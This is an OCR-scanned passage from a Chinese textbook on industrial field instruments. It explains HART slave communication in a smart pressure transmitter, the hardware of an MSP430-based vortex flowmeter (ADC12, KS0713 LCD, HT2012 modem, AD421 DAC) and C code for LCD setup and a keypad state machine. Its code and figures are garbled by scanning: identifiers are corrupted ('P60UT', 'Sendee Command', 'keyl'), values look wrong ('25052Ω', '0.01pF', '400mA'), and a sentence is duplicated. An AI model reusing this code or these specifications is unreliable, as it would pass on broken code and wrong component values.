和Ut ,在 m个不同温度状态对压力传感器进行静态标定 ,输入输出静态特 性曲线如图3-40所示 。 图 3-40 输入输出静态特性曲线 3) 通信程序 。 HART通信软件即 HART协议数据链路层和应用层的软件实现 , 是 HART智能变送器模块设计的重点 。 HART通信为主从方式 , 智能变送器作为从设备 , 除 了处于突发模式外 , 只有在接收到主设备发来的命令后才作出应答 , 所以智能变送器的 HART通信模块也即从设备的 HART通信程序 。 首先 ,在上电和看门狗复位后 , 主程序要对通信部分进行初始化 ,初始化主要包括串口 工作方式设定 、波特率设定 、系统时钟设置 、清通信缓冲区 、清通信标志字和开中断等 。初始化完成后 ,通信部分就处于等待接收状态 , 一旦上位机有命令发来程序就进入接收状态, 第一步程序根据 HART的链路层协议把主机发来的数据包放入通信缓冲区 ,并得出校验和 与主机的校验字节进行比较 ,如果正确则进行下一步处理 ,否则进入通信错误处理程序; 第 二步如果接收无差错则检查地址项 , 判断和变送器的地址是否相符合 , 如不符 , 则不予处 理 ,变送器将仍处于接收状态 ,反之变送器将禁止接收并准备回答主机的命令 。在准备应答 的过程中主要是完成对主机命令的解释 ,并根据此命令去执行相应的操作 ,最后把要回传到 主机的内容放入通信缓冲区等待发送 ,应答完主机后从机进入接收状态 ,等待主机的下一条 命令 。 进入串口中断服务程序后 ,要先判断是发送请求还是接收请求 。若发送请求标志为 1则 转向发送服务程序 ,若接收请求标志为1则转向接收服务程序 。 首先看发送程序 ,发送操作是在程序运行过程中向上位机发送信息 ,要设置发送请求标 志 ,将要发送的数据信息存入串口发送缓冲区 ,并计算水平校验 ,在此将要发送的数据信息 的格式为: 前导码2个字节 ,定界符1个字节 ,地址码1或5个字节 ,命令号1个字节 , 字 节长度1个字节 , 响应码2个字节 ,数据0~25个字节 ,校验和1个字节 。发送时 ,先要启 动发送载波 ,初始化物理层 ,建立通信链路和另一对等通信实体通信 ,发送应答帧 ,发送结 束后停止发送载波 ,终止物理层链路通信 。发送服务首先发送前导码 , 每发送一个前导码计 数器就减1,然后发送 HART协议的应答帧 ,发送结束就停止发送载波 。 接收准备是将串口设置为接收状态 , 启动定时器 , 开串口中断 , 最大允许传送字节数 26H送总字节计数器 , 每接收1个字节 ,该计数器减1。 协议规定了两个相邻接收字节之间的间隔时间不得超过一个字节时间 。 由于线路噪声或 干扰引起的通信错误可能出现 HART帧的任一位置 , 协议还专门规定了相应的错误响应 措施 。 接收服务程序过程为: 首先接收前导码 , 每接收1前导码 , 前导码计数器加 1,再接收 定界符 ,若为有效的定界符且前导码计数器大于 1,则为 HART帧的起始位置 , 根据定界 符确定 HART帧的类型 ,若为应答帧或阵发帧则终止接收服务 , 等待载波结束; 若为请求 帧 ,则确定帧格式 ,设置接收长帧格式或短帧格式地址计数值 , 短帧格式地址接收 1个字节 ,长帧格式地址接收 5个字节 。再接收命令号 , 数据字节长 度字节 ,若数据字节长度字节出现奇/偶校验错误则终止接收 服务 ,等待载波结束 , 否则设置数据字节长度计数器 。 每接收 1数据字节 ,长度计数器减1,最后接收水平校验和 。若接收请 求地址匹配 , 对接收 HART帧异或求水平校验和 , 并与接收 水平校验和进行比较 , 相同则表示无通信错误 , 否则置水平校 验和错误标志为 1,设置应用层软件数据接口 。接收服务在检 测到通信链路载波时 , 首先确定 HART帧的起始位置 , 协议 规定两个连续字节“ OxFF”及定界符表示 HART帧有效起始 位置 ,根据定界符确定帧的类型 , 由字节长度确定 HART帧 的结束位置 。 图3-41~图3-44给出通信接收的流程图 。 图 3-42 通信接收的流程图 2 应用层的软件实现也即实现 HART协议的三类命令,具体流程为 : 当接收到信息帧时 , HT2012的载波检测口 OCD变为低电平,触发中断,启动接收,接收完毕后, 如果没有通 信错误,则要根据命令号完成相应的命令功能,按照一定格式生成应答帧放入发送缓冲区,启动发送,发送完毕后关闭串口中断。而假若接收的过程中发生了通信错误或不符合命令的 要求,则发送包含错误信息的应答帧。若处于突发模式则首先要先判断突发间隔定时器是否 到点,是则发送一个突发命令应答帧,发送完后复位突发间隔定时器。在基于 HART协议 智能压力变送器的研究和开发实际应用中,为了避免定时器中断不能得到即时响应而带来时间误差和测量误差 , 而将 HART命令响应程序置于主程序中 , 中断处理程序中只相应设定 命令接收成功和错误标志 。 3.3.2.3 过程控制系统流量传感器 现场总线流量测量仪表的功能包括: 德州仪器公司的超低功耗混合数字信号处理器为核 心对涡街脉冲计数, 根据用户的菜单选择实时计算出瞬时体积流量和累积体积流量或者是瞬 时质量流量和累积质量流量, 采用128×64位的点阵式 LCD显示 。用户可通过人机接口键 盘现场修改各种参数, 包括显示精度 、仪表常数 K、满度量程设定 、满度量程设定单位 、量 程下限设定(小信号切除)、 检测流体介质选择 、温压补偿选择 、 累积流量清零 、计算方式选择 、密度设定 、密码修改 。 累积流量和各种基本 参数在系统掉电以后仍能被保存 , 系统重新上电或 复位后智能流量计无需再人为操作就能按照原先的 设置继续工作 , 累积流量也在精度允许范围内不丢 失数据 。 采用数字信号处理 (Digital Signal Pro- cessing) 技术对信号进行处理 , 编程在非信号处理 专用芯片 — 混合数字信号处理器上实现数字自适应 陷波算法 。集成 HART总线模块 , 通过现场总线 实现交换信息 。 (1) 涡街流量计结构原理 。 涡街流量计由传感器和转换器两部分组成 。传 感器包括旋涡发生体 (阻流体)、 检测元件 、仪表 表体等 ;转换器包括前置放大器 、滤波整形电路 、 D/A转换电路 、输出接口电路 、 端子 、 支架和防 护罩等 。涡街流量计内部结构如图3-45所示 。 旋涡发生体一般分为单旋涡发生体和多旋涡发 生体两类 。单旋涡发生体的基本形有圆柱 、矩形柱 和三角柱 ,其他形状皆为这些基本形的变形 。三角 柱形旋涡发生体是应用最广泛的一种 。 为提高涡街 强度和稳定性 ,可采用多旋涡发生体 。 在旋涡发生体后部安放压电传感器 , 检测旋涡 列的产生频率 。压电传感器的基本原理是利用压电 材料的压电效应 , 即当有一力作用在压电材料上 时 ,传感器就有电荷(或电压) 输出 , 因此从它可测的基本参数来讲是一个力传感器 ,需要通过别的检测电路变换为所需要的信号 。 图 3-45 涡街流量计内部 结构示意图 由于外力作用在压电材料上产生的电荷只有在无泄漏的 情况下才能保存 , 即需要测量电路回路具有无限大的输入阻 抗 。这实际上是不可能的 。 因此压电传感器不能用于静态测 量 。压电材料在交变力的作用下 , 电荷得以不断补充 , 可以 供给测量回路以一定的电流 , 故适宜动态测量 。 卡门涡街产 生的旋涡正好是交变脉动的 ,适合用压电传感器 。 压电材料分为压电晶体与压电陶瓷两大类 。前者是单晶 体 ,后者为多晶体 。涡街流量计中广泛采用的压电材料多为 压电晶体 。 转换器把压电传感器产生的电荷信号经过放大 、 滤波 、 整形后得到边缘陡峭的脉冲 ,微处理器对脉冲计数 , 以此为 基础计算出流体的流量 。通过 D/A转换器 ,微处理器将计算 出的瞬时体积流量变换成 4~20mA电流输出至电流环路中, 以便上位机进一步对其进行处理 ,通过 HART总线接口 ,微处理器可以与上位机交换更多的信息 ,实现信息集成 。按键和显示模块可实现就地参数修改 和就地显示 。 (2) 现场总线流量仪表硬件组成 。 1) 混合数字信号处理芯片 。嵌入式数字智能涡街流量计的核心微控制器部分采用的是 混合数字信号处理芯片 MSP430F149, 它属于 TI公司出品的 MSP430系列单片机 , 是一种 具有超低功耗特性的功能强大的单片机 。MSP430F1x系列具有以下一些共同的特点: .超低功耗 。MSP430F1x运行在 1MHz时钟条件下 ,工作电流视工作模式不同为 0.1~ 400mA,工作电压为1.8~3.6V。 .强大的处理能力 。 MSP430F1x具有丰富的寻址方式 , 片内寄存器可实现多种运算, 有高效的查表处理方法 。 . MSP430F1x中断源较多 , 具有 4类中断 ——— 系统复位 、可屏蔽中断 、非屏蔽中断 、 (非) 屏蔽中断 ,并且可以任意嵌套 ,使用灵活方便 。 当系统处于省电的备用状态时 , 用中 断请求将它唤醒只需要6μs 。 .丰富的 片 上 外 围 模 块 。 MSP430F1x中 的 各 个 成 员 集 成 了 较 多 的 片 上 外 围 资 源 。 MSP430F149包含: 12位 A/D转换器 ,精密模拟比较器 ,硬件乘法器 ,2组频率可达8MHz的 时钟模块 ,2个带有大量捕获/比较寄存器的16位定时器 ,看门狗 ,2个可实现异步 、 同步及 多址访问的串行通信口 ,数十个可实现方向设置及中断功能的并行输入 、输出端口等 。 .方便高效的开发方式 。 MSP430F1x具有 FLASH 存储器 , 这一特点使得它的开发工 具相当简便 。 利用 JTAG接口或片内 BOOT ROM , 就可以在一台 PC及一个结构小巧的 JTAG控制器的帮助下实现程序的下载 ,完成程序调试 。 .多种存储器形式 。MSP430F1x的各个型号大多有性能相同而存储器不同的 ROM 型 、 OR型 , 以适应产品在设计 、开发 、生产的各个不同阶段的需要 。 .适应工业级运行环境 。 MSP430F1x的运行环境温度范围为—40~+85℃ , 所设计的 产品适合运行于工业环境下 。 图3-46为系统所采用的核心微处理器 MSP430F149的内部结构框图 。 2) 模/数转换器 ADC12。ADC12是12位精度的 A/D转换模块 ,具有高速 、通用的特点 。 它具有5大功能模块 ,都可以独立配置 , 即带有采样/保持功能的 ADC内核 ,可控制的转换存 储 ,可控制的参考电平发生器 ,可控制和选择的时钟源 ,可控制的采样及转换时序电路 。 ADC12的采样/转换采样操作 。 当采样信号 SAMPCON为高时 , 采样/保持电路对模拟 信号采样 , 当 SAMPCON出现下降沿时 , 转换即发生 。 当 SAMPCON为低时 , 采样/保持 电路保持信号值 。转换需要13个时钟周期 。 为得到精确的转换 , 在采样期间 , 输入模拟信 号应保持稳定有效 。 同时也希望在整个转换过程中 ,相邻的通道不出现数字活动 , 以保证电 源毛刺 、地电平波动 、交互串扰等不会影响转换结果 。 控制采样时序及转换开始的 SAMPCON信号可以来自几种信号: ADC12SC,Timer A0 OUT1,TimerB0OUT0和 TimerB0OUT1。 以此信号的上升沿启动采样操作 , 同时启动 采样定时器 。此方式为脉冲采样模式 。另外 ,还可以采用扩展采样模式 ,该模式的采样信号 不经过采样定时器 ,直接用作 SAMPCON信号的源 ,完全控制采样时序 , 而与 ADC12CLK 异步 。 ADC12的采样/转换过程: A/D转换从采样信号 SAMPCON的下降沿开始 ,整个转换过程需要13个时钟周期 。转换时间=13× (ADC12DIV/DI×12CGK), 其中 ADC12DIV是 1~8的整数 。ADC12的转换时钟 (ADC12CLK) 用于 A/D转换 ,并产生采样周期 , 可选 自内部振荡器 ADC120SC或 ACLK、MCLK、SMCLK, 并可作 1~8分频 。 内部振荡器产 生约5MHz的 ADC120SC信号 ,振荡频率会随芯片 、 电源电压 、温度等因素改变 , 当需要 精确的转换时序时 ,应选择稳定的时钟源 。 ADC12用5个控制寄存器 、16个转换存储寄存器和 16个转换存储控制寄存器来配置 。 16个存储寄存器(ADC12MEMx) 每个都配有各自的控制寄存器 (ADC12MCTLx), 来说 明每次转换的采样通道和参考电平 。其他的 ADC12的工作条件 , 如转换模式 、采样和转换 控制信号 、A/D时钟 、采样时序等 , 由控制寄存器 ADC12CTL0和 ADC12CTL1定义 。 另 外3个控制寄存器 ——— ADC12IFG、ADC12IE、ADC12IV分别为中断标志寄存器 、 中断允 许寄存器 、 中断向量寄存器 。 需要采样的物理量有两个: 流体温度及管道压力 。 经 AID转换后的数字量将用于热蒸 汽流量检测的补偿计算 , 因此采用序列通道单次采样模式 。用芯片的 2、3引脚 (ADC12的 输入通道a3、a4) 作为模拟信号的输入端 。控制寄存器的设置如下: ADC12CTL1的 CON- SEQ设为 O1,选择序列通道单次采样模式 , CstartAdd位设为 0; 定义序列转换首地址的 ADC12的转换存储寄存器 ADC12MEM0, 由于每个转换寄存器有一个相应的转换存储控制 寄存器 ,CstartAdd同时也就定义了 ADC12MCTL0。 ADC12MCTL0的 EON 位为 0, ADC12 MCTL1的 EOS位为 1, 这样 , 序列转换从 ADC12MEM0开始 , 到 ADC12MEM1结束 。为了再次执行该序列转换 ,需将 ENC位置位 。 具体采样/转换过程如图3-47所示 。 图 3-47 采样/转换过程 3) 人机接口按键输入模块 。人机接口按键输入模块的电路原理图如图3-48所示 。人机接口按键输入模块 , 由于仪表盘大小和人性化设计的限制 , 只设置了 4个按键 (最多可以设置 5个按键), 每个按键通过一个 10kΩ的上拉电阻拉高,再分别接入 MSP430F149的I/O口 。 根据现场修改多种参数的要求 , 智能涡街流量计在修改参数模式下菜单选择项最多时达到了四级菜单 , 同时还涉及数字输入和移位 , 因此对于 4个按键做了具体的功能分配,以达到合理利用仅有的 4个按键完成数字输入 、数字 移位 、模式切换 、菜单选择 、菜单确认 、任务结束等诸多功能 , 避免了通常厂家所采用的复用键方法 。 4个按键具体功能分配如下:Ⅰ号键功能: 修改参数值 , 每次按住 Ⅰ号键 , 修改位参数值就会不断自动加一 ,直至松手为止 。Ⅱ号键功能: 选择功能菜单 , 每按一次 Ⅱ号键,在同级菜单中选择目前所选定的下一功能 。 Ⅲ号键功能: 修改参数值时左移一位 , 即在修改参数值时每按一次 Ⅲ号键 ,进入目前修 改的参数位的左边一位 。 Ⅳ号键功能: 功能确认 , 每按一次 Ⅳ号键 ,表示确定选择该功能 。 按键状态信息的输入采用查询方式 ,单片机不断扫描以上端口 ,若有键按下 ,该端口变 为低电平 ,单片机转向执行按键子程序 ,实现对应于该键的操作 。 4) 人机接口点阵式液晶显示模块 。 液晶显示控制芯片 KS0713是内藏控制器的点阵式 液晶图形显示模块 ,是目前很受欢迎的一类产品 , 内藏控制器的点阵式液晶图形显示模块的 核心就是该显示模块内部自带的专用控制器 。 由 SAMSUNG ELECTRONICS公司生产的小 型液晶显示模块控制器 KS0713正逐步受到市场的欢迎 ,在一些小型的自动控制 、监控 、测 量仪器中 , 常常用于控制显示模块显示提示菜单 、波形或是各类参数的变化 , 以便实现实时 监控和测量 。KS0713控制芯片具有以下特点: .体积小 ,外观尺寸只有42mm×39mm ,29个引脚 。 .可直接由微处理器控制 。 .高灵活性 ,数据读写操作不受外部时钟控制 。 .集成化程度高 , 自带液晶所必需的电源驱动 。 正是因为 KS0713芯片可以直接驱动 LCD的行 、列显示 , 因此它直接是液晶驱动器与 微处理器的接口 , 它以最简单的方式受控于 MCU ,接收并反馈各种信息 , 经过自己独立的 信息处理实现对显示缓冲区的管理 ,并向液晶驱动器提供所需要的各种信号 、脉冲 ,操纵驱 动器实现模块的显示功能 。该液晶模块初始化十分简便 ,使用户摆脱了以往在开发过程中的 对控制器的设计 、加工 、制作等一系列工作 , 又避免了单片机对显示器的繁琐控制 ,节约了 单片机系统的内部资源 ,其内部结构如图3-49所示 。 控制芯片 KS0713由于集成化程度高 、性价比高 、控制简单 、显示方式丰富 (如可实现 滚屏显示 、 图形显示), 在数字化仪表(如数字式涡街流量计 、心电图波形显示)、 便携式仪表(如手持式数据采集器)、 公交IC卡系统终端 、智能化家电和大量嵌入式应用系统的显示 模块中已经得到了非常广泛的应用 。 5) HART总线模块 。 HART物理层采用基于 Be11202通信标准的 FSK技术; 波特率: 1200bit/s; 逻辑1∶1200Hz; 逻辑0∶2200Hz。 由于正弦信号的平均值为0, HART通信信 号不会影响4~20mA信号的平均值 ,这就使 HART通信可以和 4~20mA信号并存而不互 相干扰 ,这是 HART标准的重要优点之一 。智能设备要检出 HART通信的信号 ,要求它有 0.25Vp- p 以上的电平 , 因而二线制智能设备与电源之间至少要有 25052Ω以上的电阻 , 以免 这一信号被电源的低内阻所短路 。多数现有电缆都可以用于 HART通信 , 限制信号传输距离的主要因素还是电阻 、 电感与分布电容对信号的衰减 ,单台设备使用距离达3000m , 多站 结构也可达1500m ,这对于大多数用户是足够的 。 数据链路层规定了通信数据的结构: 每个字符由 11位组成 , 其中包括: 1bit起始位 、 8bit数据 、1bit奇偶校验位 、 1bit停止位 。 不仅每个字节有奇偶校验 , 一个完整的 HART 数据也用一个字节进行纵向校验 。 HART数据格式如图3-50所示 。 由于数据的有无与长短 并不恒定 ,所以 HART数据的长度也是不一样的 ,最长的可以包括25个字节 。 图 3-50 HART数据格式 HART通信协议允许两种通信模式: ①“ 问答式”, 即主设备向从设备发出命令 ,从设 备予以回答 , 每秒钟可以交换两次数据; ②“ 成组模式”, 即无须主设备发出请求而从设备 自动地连续发出数据 ,传输率每秒提高到3.7次 ,但这只适用于“ 点对点 ” 的连接方式 , 而 不适用于多站连接方式 。 HART模块主要由两个部分组成 , 一个是以 AD421为核心的 D/A模块 , 另外一个是 以 HT2012为核心的模块 。AD421模块实现 HART电压信号向 ±0.5mA电流信号的转换, 同时为整个系统的核心微处理器模块 、人机接口按键输入模块 、人机接口液晶显示模块同时 提供电源 , 而 HT2012则是 HART协议的通信芯片 。 SMAR公司的 HT2012是工作在 Be11202标准下采用 FSK技术的 CMOS低功耗调制解 调器 。 HT2012芯片用来实现 HART协议中通信信号的解调及调制过程 , 它为过程控制仪 表和其他低功耗设备提供 HART通信能力 。 HT2012是一种半双工的 MODEM , 主要包含 4个功能块: 时钟 、解调器 、调制器和载波监听器 。其传输速率为 1200bit/s 。 HT2012的工 作频率为1200Hz(逻辑1) 和2200Hz(逻辑0)。 这两个正弦信号以很小的电流叠加到直流 信号上 ,实现在一般4~20mA直流环路上同时传送模拟和数字信号 , 而且不管数字信号是 否存在 ,不会在4~20mA直流信号上附加额外的直流成分 。 因此用一个低通滤波器能有效 地滤除数字信号 ,使得在实现 HART协议的一般 4~20mA模拟信号测试系统能照常工作 。 一个单极点的10Hz低通滤波器能把数字信号减小到满量程信号的±0.01% 。 HT2012的解调过程: 由带通滤波输入电路输出的脉冲信号从IRXA进入 HT2012后, 调制解调器将脉冲信号中的1200Hz解调为数字1,2200Hz解调为数字 0,解调后的数字信 号由 HT2012的 ORXD端口输出 ,通过 CPU的串口输入端 RXD进入 CPU ,CPU对接收到 的数据进行判断并执行相应的任务 。 HT2012的调制过程: CPU向上位机或控制系统发送数字信号时 , 首先通过 CPU的串 口输出端 TAD,将数字信号送到 HT2012的ITXD调制器输入信号端口 , 然后调制解调器将数字信号1或0调制为1200Hz或2200Hz的方波 ,从 HT2012的 OTXA调制器输出信号 端口输出 ,最后送到整形输出电路上 ,具体的电路如图3-51所示 。 图 3-51 HT2012调制解调电路 . D/A转换电路(AD421)。 D/A转换电路(AD421) 如图 3-52所示 。AD421是美国 AM 公司推出的一种单片高 性能数/模转换器(DAC), 它由电流环供电 , 16位数字信号以串行方式输入 , 4~20mA电 流输出 ,可实现低成本的远程智能工业控制 。 AD421主要由电压调整器 、数模转换器和电 流放大器 组 成 。 AD421内 部 的 电 压 调 整 器 可 提 供 5V、 3.3V 或 3V 输 出 电 压 , 还 含 有 1.25V, —2~2.5V基准电源 ,均可为其自身或其他电路选用 。AD421采用 Σ — Δ结构 ,保 证16位的分辨率和单调性 ,其积分线性误差为 ±0.001% , 失调误差为 ±0.1% , 增益误差 为±0.2% ,AD421与标准 HART电路或其他类似 FSK协议的电路完全兼容 。标准的三线 串行接口可在10Mbit/s下运行 ,便于与通用微处理器或微控制器相连 。 电压调整器由一个运放 、带隙基准和外接耗尽型 FET调整管构成 。 电压调整器从电流 环路中获取电流 ,并给 AD421及其他器件提供电流 。LV端连接的改变使放大器增益改变, 从而改变 Vcc脚的电压 。 当 LV接 COM 时 , Vcc为 5V; 当 LV接 Vcc时 , Vcc为 +3V; 当 LV通过0.01μF电容接 Vcc时 ,Vcc为3.3V。 数模转换器在时钟 CLOCK作用下 , 输入移位寄存器把 DATA引脚上的数据逐位读 入 , LATCH锁存 脉 冲 把 寄 存 器 中 的 数 据 锁 存 到 DAC中 。 若 在 两 个 锁 存 脉 逐 位 读 入 , LATCH锁存脉冲把寄存器中的数据锁存到 DAC中 。 若在两个锁存脉冲间隔输入 16个 CLOCK时钟周期 , 就锁存 16位数字信号并完成正常的电流转换 。 若多出 16个时钟周期 , 只锁存最后输入的 17位数据并输出报警电流信号 。 16位 Y— ODAC由一个二阶调制 器及其后一个连续时间滤波器组成 , 从调制器来的一串位流控制一个开关电流源,(开关 电流源的输出经三组电阻一电容滤波环节滤波 , 三个电阻集成在芯片中 , 而三个电容需 外接在引脚 C1 ~C3), 然后送给电流放大器进行精密放大 , 从而保证输入数字量与对应电 流的单调性 。 图 3-52中的 BOOST脚和 Vcc相连 , 当输入 0到满量程时 , LOOP RTN脚 输出相应的 4~20mA电流 。 当输入的 16位数据为 0000000000000000时 , AD421输出电 流4mA;输入数据为1111111111111111时 ,AD421输出电流 20mA。精度可达 (20—4)/ 65536=244(nA)。 AD421电压调整器与 DN25D调整管一起 , 给 AD421及其他部件供电 , Vcc脚接 10μF 去耦电容 ,保证调整器输出稳定 ,并吸收 AD421及其他器件产生的尖脉冲 。 为了稳定电压 调整器中的运放与外部调整管形成的反馈回路 ,不仅在 COMP与 DRIVE之间接 0.01μF电 容 ,还要在 DRIVE与 COM 之间接 1kΩ电阻和 1000pF电容 。 AD421内部 2.5V 基准源 REFOUT2直接用作 REF IN脚输入基准电压 ,外接一个 4.7pF去耦电容 。 片内 DAC后接 的连续时间滤波器 , 需外接三个低介质吸收电容 , 一般 C1 =C2 =0.01pF,C3 =3300pF。 AD421数字接口有三根线 ,直接与通用微处理器相接 , DATA数据在 CLOCK时钟上升沿 装入输入移位寄存器 ,在 LATCH锁存控制上升沿装入 DAC锁存器 。 (3) 现场总线流量仪表软件组成 。 1) 控制主程序 。嵌入式智能数字涡街流量计系统软件采用主控程序循环扫描和计数/定 时器中断的并行结构 ,使脉冲计数与信号处理并行进行 。 在完成系统出厂后的初次设定以后 , 系统每次上电首先完成各硬件模块的初始化工作, 之后开定时中断和脉冲计数中断 。 主程序完成流量计算 、 电流信号输出及 LCD显示和按键 扫描 ,脉冲计数则由中断服务程序完成 , 以保证测量的实时性 。 主程序流程图如图 3-53所示 。 2) 液晶控制芯片 KS0713软件 。 &S0713初始化的基本步骤与其他同类控制芯片的初始 化基本相同 ,具体过程见以下程序段及其注释 。 KS0713内部的 ADC、SHL定义了数据逐 行 、逐列显示的逐次顺序 。KS0713的初始化程序如下: 图 3-53 主程序流程图 void Init LCD(void)//定义初始化函数 ﹛ P60UT&=-RESET;//复位位置零 P60UT&=RESET;//复位位置位 P60UT&=-CS;//并行数据传输片选位 置零 Sendee Command(0xE2); //复位指令 Sendes Command (0xAI); / * ADC 指 令 (ADC=1) 数据传输 SEG132-SEG1, 液晶屏幕显示 SEGI-SEG132*/ Sendes Command ( 0xC0); //SHL 指 令 (SHL=0) 传输 ,显示 C0M1-C0M64 Sendes Command(0xA3); //设定 LCD占空 比为 1/9 Sendes Command(0x2F); //设定电源控制 Sendee Command (0x26); //调 节 寄 存 器 选择 Send Command(0x81); //设 定 参 考 电 压 模式 Sendee Command(0XIC); //设定参考电压 寄存器 Sendwe Command (0X40); //设 定 显 示 行 (C0M1) Send Command(0xAF); //等待显示开始 ﹜ DDRAM用来存放液晶的显示数据 , 它是一个 65行 、 132列的地址空间 。 65行构成了 9页 ,其中前8页由8列构成(DB0~DB7), 第 9页是单独的一行 (只有 DB8)。 显示数据 DB0~DB7直接通过 MCU的数据口送入 ,并通过 DB0~DB7直接读写到对应的 8行 。 同时 每一个点阵可以通过确定行地址和列地址来确定位置 。 而且行地址根据显示起始行 (CO- MO) 为 DDRAM 提供行地址 , 因此可以简单的通过改变行地址 , 在不改变片内 RAM 的情 况下实现滚屏显示 。 由于 KS0713的地址空间是65×132的 , 实际在控制 LCD时由于只用到 64×128的地 址空间 ,就存在着起始地址的问题 。KS0713内部规定了65行构成了 9页 ,其中前 8页由 8 行构成(DB0~DB7), 第9页是单独的一行(只有 DB0), 因此数据并行传输过去之后始终 是从 DB0(第一行) 开始显示 。而列地址则不同 , 内部地址对应的方式不同则会导致起始数 据列地址的不同 。如果 , LCD的第0列地址和 KS0713的第0列地址相对应 ,则相应的起始 列地址为0x00; 如果 , LCD的第0列地址和 KS0713的第 1列地址相对应 , 则相应的起始列地址为0x01; ……依此类推 。 因此在使用以 KS0713为内控制器的液晶显示时对此问题要 特别注意 。我们通过实验发现深圳显能实业公司的 SG12864-5C(128×64点阵式 LCD内 部采用一块 KS0713控制器) 液晶显示模块 , 其内部 LCD的第 0列地址实际上和 KS0713 的第 4列地址相对应 , 而与其所提供的通用汇编演示程序:“MOV A, #02” 的列起始地 址有出入 , 而且原文件中也未对其所举范例中列地址为何从 #02开始做出明确的解释 。 实 际以此液晶显示模块显示传输的并行数据的起始列地址应为 #04, 以 C430语言为例的指令 如下: SendCommand(0xB0); //送“ 起始行 ”命令 SendCommand(0X04); //送“ 起始列 ”命令 Sendes Data(seg [i]); //并行数据传输 3) 基于状态分析的键盘程序 。仪表一个包含 4个按键的键盘 , 用户通过对这 4个按键 的操作 ,实现功能切换和参数设置等多项功能 。在嵌入式系统 MCU内部程序段中如何有序 地组织这些功能 ,如何根据用户不同的操作习惯方便地改变这些组织方式 。 当用户在某一时 刻按下某一按键时 , 系统能正确地执行相应的功能 。状态分析法的基本思想是: 在键盘按键 不多的情况下 , 给每一个按键分配一个状态变量(占 1字节), 每个状态变量共有 256种状 态(0~255), 可根据需要任意选用 , 每一个状态对应一种功能 , 这样一个按键最多可实现 256种功能 。在某一时刻 , 当用户按下按键 ,希望执行某项功能时 , 只要保证在用户按下该 键之前 ,该键处于相应的状态即可 。这样就实现了通过控制按键状态变量的状态来达到对其 功能控制的目的 。根据对部分系统功能的分析 , 每一个按键分配的状态与按下该键执行的相 应功能的对应关系如下 。 . Ⅰ号键状态 — 功能: 1— 修改“ 密码右位 ” 的值; 2— 修改“ 密码中位 ” 的值; 3— 修改“ 密码左位 ” 的值 。 .Ⅱ号键状态 — 功能: 1— 由菜单“ 设置小数点标志位 ” 到同级菜单的下一选项; 2— 由菜单末尾项功能返回到菜单“ 设置小数点标志位 ”选项 。 .Ⅲ号键状态 — 功能: 1— 参数修改位由“ 密码右位 ”移位至“ 密码中位”; 2— 参数修改位由“ 密码中位 ”移位至“ 密码左位”; 3— 参数修改位由“ 密码左位 ”移位至“ 密码右位”。 .Ⅳ号键状态 — 功能: 1— 由上电正常数据显示切换到密码输入模式 ,移位光标停在密码右位; 2— 用户密码输入完毕 ,确认 ,进入程序内部判断; 3— 确认进入菜单“ 设置小数点标志位 ” 的下一级子菜单; 4— 确认选择一级菜单中的“ 结束返回”, 直接返回“ 上电显示 ”模式 。 开发的数字嵌入式智能涡街流量计系统的键盘处理程序的部分源代码如下: unsigned int key _ value= 0;//keyvalue初始值为 0 unsigned int key1_ state=0;//key1state初始值为 0 unsigned int key2_ state=0;//key2state初始值为 0 unsigned int key3_ state=0;//key3state初始值为 0 unsigned int key4_ state=1;//key4state初始值为 1 void key do(void) ﹛switch(keyvalue) ﹛case1:keyl _ do(); break; //按下 Ⅰ号键时调用 Ⅰ号键处理函数 case2:key2_ do(); break; //按下 Ⅱ号键时调用 Ⅱ号键处理函数 case3:key3_ do(); break; //按下 Ⅲ号键时调用 Ⅲ号键处理函数 case4:key4_ do(); break; //按下 N号键时调用 N号键处理函数 default: break;﹜ keyvalue=0;//执行完相应的功能后 ,按键值清零 ,等待下一次按键 ﹜ void key4_ do(void) //Ⅳ号键处理函数 ﹛switch(key4state) ﹛ case1:key4_ state _ 1_ do(); break; case2:key4_ state _ 2_ do(); break; case3:key4_ state _ 3_ do(); break; case4:key4_ state _ 4_ do(); break; default: break;﹜ ﹜ void key3_ do(void) //Ⅲ号键处理函数 ﹛switch(key3_ state) ﹛ case1:key3_ state _ 1_ do(); break; case2:key3_ state _ 2_ do(); break; case3:key3_ state _ 3_ do(); break; default: break;﹜ ﹜ void key2_ do(void) //Ⅱ号键处理函数 ﹛switch(key2state) ﹛ case1:key2_ state _ 1_ do(); break; case2:key2_ state _ 2_ do(); break; default: break;﹜ ﹜ void keyl _ do(void) //Ⅰ号键处理函数 ﹛ switch(keyl _ state) ﹛ case1:keyl _ state _ 1_ do(); break; case2:keyl _ state2_ do(); break; case3:keyl _ state3_ do(); break; default: break;﹜ ﹜ void key4_ state _ 1_ do(void) ﹛display _ input _ password(); //输入密码显示单元函数 key1_ state=0;key2_ state=0;key3state=0;key4state=1;﹜ //保证在此情况下按下 Ⅰ , Ⅱ , m键无效 void key4_ state _ 2_ do(void) ﹛ inside _ passwordescompare(); //内部用户密码输入判断 Key1_ state=3;key2_ state=0;Key3_ state=3;key4_ state=2;﹜ void key4_ statees _ 3_ do(void) ﹛dot _ position _ choose(); //小数点精度设置函数 key1_ state=0;key2_ state=1;key3_ state= 0;key4_ state=3;﹜ void key4_ state _ 4_ do(void) ﹛normal display(); //“上电显示 ”正常数据模式函数 Keyl _ state=x ;key2_ state= y ;key3_ state=z ;key4_ state=4;﹜ void key3_ state _ 1_ do(void) ﹛change _ mid _ password(); //修改“ 密码中位 ” 函数 key1_ state=1;key2_ state=0;key3_ state=1;key4_ state=0;﹜ void key3_ statees _ 2_ do(void) ﹛change _ left _ password(); //修改“ 密码左位 ” 函数 Keyl _ state=2;key2_ state=0;key3_ state=2;key4_ state=0;﹜ void key3_ state _ 3_ do(void) ﹛change _ right _ password(); //修改“ 密码右位 ” 函数 Keyl _ state=3;key2_ state=0;key3_ state=3;key4_ state=2;﹜ void key2_ state _ 1_ do(void) ﹛change _ normal _ para(); //选择“ 精度设置 ” 同级菜单中的下一功能函数 key1_ state=0;key2_ state=1;key3_ state=0;key4_ state=3;﹜ void key2_ stateto _ 2_ do(void) ﹛dot _ choose(); //返回“ 小数点精度设置 ” 函数的功能选择 key1_ state=x ;key2_ state=2;key3_ state=y ;key4_ state=z;﹜ void keyl _ state _ 1_ do(void) ﹛change _ number(); //修改当前位数值 key1_ state=1;key2_ state=0;key3_ state=1;key4_ state=0;﹜ void keyl _ state _ 2_ do(void) ﹛change _ number(); //修改当前位数值 keyl _ state=2;key2_ state=0;key3_ state=2;key4_ state=0;﹜ void keyl _ state _ 3_ do(void) ﹛change _ number(); //修改当前位数值 key1_ state=3;key2_ state=0;key3_ state=3;key4_ state=2;﹜ 3.4 